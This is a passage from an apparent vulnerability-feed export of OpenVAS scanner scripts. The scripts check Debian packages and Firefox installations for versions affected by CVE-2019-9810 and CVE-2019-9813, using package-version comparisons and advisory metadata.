ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += 
res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cak\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = 
isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = 
isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ia\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = 
isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ka\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kab\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-my\", 
ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ne-np\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-oc\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"60.6.1esr-1~deb9u1\", 
rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ur\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": 
{"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:46:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310814940", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814940", "type": "openvas", "title": "Mozilla Firefox Security Updates(mfsa_2019-09_2019-10)-Windows", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814940\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 10:55:58 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Mozilla Firefox Security Updates(mfsa_2019-09_2019-10)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - IonMonkey MArraySlice has incorrect alias information and\n\n - Ionmonkey type confusion with __proto__ mutations.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before 66.0.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 66.0.1\n or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_mandatory_keys(\"Firefox/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"66.0.1\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"66.0.1\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:46:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310814947", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814947", "type": "openvas", "title": "Mozilla Firefox ESR Security Updates(mfsa_2019-09_2019-10)-MAC OS X", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later 
version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814947\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 11:36:36 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Mozilla Firefox ESR Security Updates(mfsa_2019-09_2019-10)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - IonMonkey MArraySlice has incorrect alias information and\n\n - Ionmonkey type confusion with __proto__ mutations..\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox ESR version before 60.6.1 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version 60.6.1 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox-ESR/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"60.6.1\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"60.6.1\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T19:25:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "The remote host is missing an update for the ", "modified": "2020-01-29T00:00:00", "published": "2019-03-25T00:00:00", "id": "OPENVAS:1361412562310891727", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891727", "type": "openvas", "title": "Debian LTS: Security Advisory for firefox-esr (DLA-1727-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# 
This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891727\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-03-25 23:00:00 +0100 (Mon, 25 Mar 2019)\");\n script_name(\"Debian LTS: Security Advisory for firefox-esr (DLA-1727-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/03/msg00029.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1727-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox-esr'\n package(s) announced via the DLA-1727-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple security issues have been found in the Mozilla Firefox web\nbrowser, which could potentially result in the execution of 
arbitrary\ncode.\");\n\n script_tag(name:\"affected\", value:\"'firefox-esr' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n60.6.1esr-1~deb8u1.\n\nWe recommend that you upgrade your firefox-esr packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dbg\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-be\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += 
